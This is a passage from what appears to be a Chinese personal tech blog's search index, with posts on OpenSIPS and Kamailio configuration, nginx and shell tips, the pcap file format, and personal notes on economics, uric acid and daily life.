applied\\r\\n\u0026#34;); }; route(1); } route[1] { # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/acc-mysql/","summary":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd.","title":"acc-mysql"},{"content":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function start the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.). Multiple pseudo-variables can be monitored by specifying a pv_format_string (e.g. \u0026#34;$ru---$avp(var1)\u0026#34;). The logs produced by multiple/different traced regions of your script can be differentiated (tagged) by specifying an additional plain string - info_string - as the 3rd parameter. To disable script tracing, just do script_trace(). Otherwise, the tracing will automatically stop at the end the end of the top route. Example of usage: script_trace( 1, \u0026#34;$rm from $si, ruri=$ru\u0026#34;, \u0026#34;me\u0026#34;); will produce: [line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) ","permalink":"https://wdd.js.org/opensips/ch7/cfg-trace/","summary":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function start the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.","title":"script_trace 打印opensips的脚本执行过程"},{"content":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上有出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我度过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说的通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地址由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事情,私营公司来做可能要比政府做的更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济以为疫情的影响和下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。\n","permalink":"https://wdd.js.org/posts/2020/05/kn7c4e/","summary":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上有出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我度过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说的通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地址由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事情,私营公司来做可能要比政府做的更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济以为疫情的影响和下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。","title":"小岛经济学: 鱼、美元和经济的故事"},{"content":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slicevim \u0026ndash; -.slice\n","permalink":"https://wdd.js.org/posts/2020/05/ei2y93/","summary":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slicevim \u0026ndash; -.slice","title":"文件名以-开头"},{"content":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_blance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance是会先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20和呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","permalink":"https://wdd.js.org/opensips/ch6/load-balance/","summary":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_blance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance是会先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20和呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","title":"负载均衡模块load_balance"},{"content":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-record/","summary":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","title":"rtpproxy录音"},{"content":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","permalink":"https://wdd.js.org/posts/2020/05/es9hvu/","summary":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","title":"nginx 配置不显示版本号"},{"content":"pwdx pid lsof -p pid | grep cwd ","permalink":"https://wdd.js.org/posts/2020/05/azkyhl/","summary":"pwdx pid lsof -p pid | grep cwd ","title":"获取进程工作目录"},{"content":" 人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温控制的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包被子里,而她只能通过哭闹反应自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~\n","permalink":"https://wdd.js.org/posts/2020/05/nkegg6/","summary":"人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温控制的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包被子里,而她只能通过哭闹反应自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~","title":"你好,下丘脑"},{"content":"从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不再新老更替、新陈代谢。\n微观世界的细胞变化,反应在人体生产,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。APT是人体直接的能量来源。\n在剧烈运动时,APT会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的APT都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质、经过酶的作用下产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在词过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏只有也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会进一步通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在声明活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量迟到7分饱,或者迟到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是由溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,对自身的关节软骨的溶解和自身软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出。对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该这道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","permalink":"https://wdd.js.org/posts/2020/05/teadt5/","summary":"从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不再新老更替、新陈代谢。\n微观世界的细胞变化,反应在人体生产,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。APT是人体直接的能量来源。\n在剧烈运动时,APT会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的APT都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质、经过酶的作用下产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在词过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏只有也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会进一步通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在声明活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量迟到7分饱,或者迟到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是由溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,对自身的关节软骨的溶解和自身软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出。对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该这道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","title":"尿酸简史"},{"content":"之前我写过OpenSIPS的文章,所以在学习Kamailio是,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git start数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以不借助外部工具的情况下,写的非常灵活。可以参考 https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得也是kaimailio也是更胜一筹,至少kamailioo还做了c的单元测试 总体而言,如果你要是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考 https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","permalink":"https://wdd.js.org/opensips/tools/kamailio/","summary":"之前我写过OpenSIPS的文章,所以在学习Kamailio是,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git start数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以不借助外部工具的情况下,写的非常灵活。可以参考 https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得也是kaimailio也是更胜一筹,至少kamailioo还做了c的单元测试 总体而言,如果你要是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考 https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","title":"另一个功能强大的sip server: kamailio"},{"content":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images. docker run -it --runtime=nvidia kaldiasr/kaldi:gpu-latest Please refer to Kaldi\u0026#39;s GitHub repository for more details. kaldiasr/kaldi这个镜像是基于linuxkit构建的,如果缺少什么包,可以使用apt命令在容器中安装\n安装oymyzsh 因为我比较喜欢用ohmyzsh, 所以即使在容器里,我也想安装这个工具\napt install zsh curl ","permalink":"https://wdd.js.org/posts/2020/05/haowe5/","summary":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images.","title":"kaldi安装"},{"content":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html\n","permalink":"https://wdd.js.org/posts/2020/05/uwe59t/","summary":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html","title":"Type 'Timeout' is not assignable to type 'number'"},{"content":"sudo killall -HUP mDNSResponder ","permalink":"https://wdd.js.org/posts/2020/05/gy02f8/","summary":"sudo killall -HUP mDNSResponder ","title":"macbook 清空DNS缓存"},{"content":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condtion ] \u0026amp;\u0026amp; action; [ conditio ] || action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。\n[[ $str1 == $str2 ]] # 测试字符串是否相等 [[ $str1 != $str2 ]] # 测试字符串是否不相等 [[ $str1 \u0026gt; $str2 ]] # 测试str1字符序号比str2大 [[ $str1 \u0026lt; $str2 ]] # 测试str1字符序号比str2小 [[ -z $str ]] # 测试str是否是空字符串 [[ -n $str ]] # 测试str是否是非空字符串 if 和[之间必须包含有一个空格 # ok if [[ $1 == $2 ]]; then echo hello fi # error if[[ $1 == $2 ]]; then echo hello fi ","permalink":"https://wdd.js.org/shell/cond-test/","summary":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condtion ] \u0026amp;\u0026amp; action; [ conditio ] || action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。","title":"比较与测试"},{"content":"","permalink":"https://wdd.js.org/posts/2020/05/db6ou6/","summary":"","title":"xmpp学习"},{"content":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之间虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pacp文件中成功提取出了语音文件。再次做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是paap文件的格式。\n开局是一个全局的头文件。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小段字节序来读取。 version_major 大版本号,16位无符号整形。一般是2 version_minor 小版本号,16位无符号整形。一般是4 thiszone 时区 sigfigs 实际时间戳 snaplen 捕获的最大的长度 network 数据链路层的类型。参考http://www.tcpdump.org/linktypes.html, 常见的1就是表示IEEE 802.3 Packet Header 当读取了pcap文件的前24个字节之后,紧接着需要读取16个字节。这16个字节中,incl_len表示packet数据部分的长度。当拿到了Packet Data部分数据的长度。我们同时也就知道了下一个packet header要从哪个位置开始读取。\ntypedef struct pcaprec_hdr_s { guint32 ts_sec; /* timestamp seconds */ guint32 ts_usec; /* timestamp microseconds */ guint32 incl_len; /* number of octets of packet saved in file */ guint32 orig_len; /* actual length of packet */ } pcaprec_hdr_t; Packet Data packet data部分是链路层的数据,由global header的network类型去决定,一般可能是802.3的比较多。\nIEEE 802.3 当拿到packet 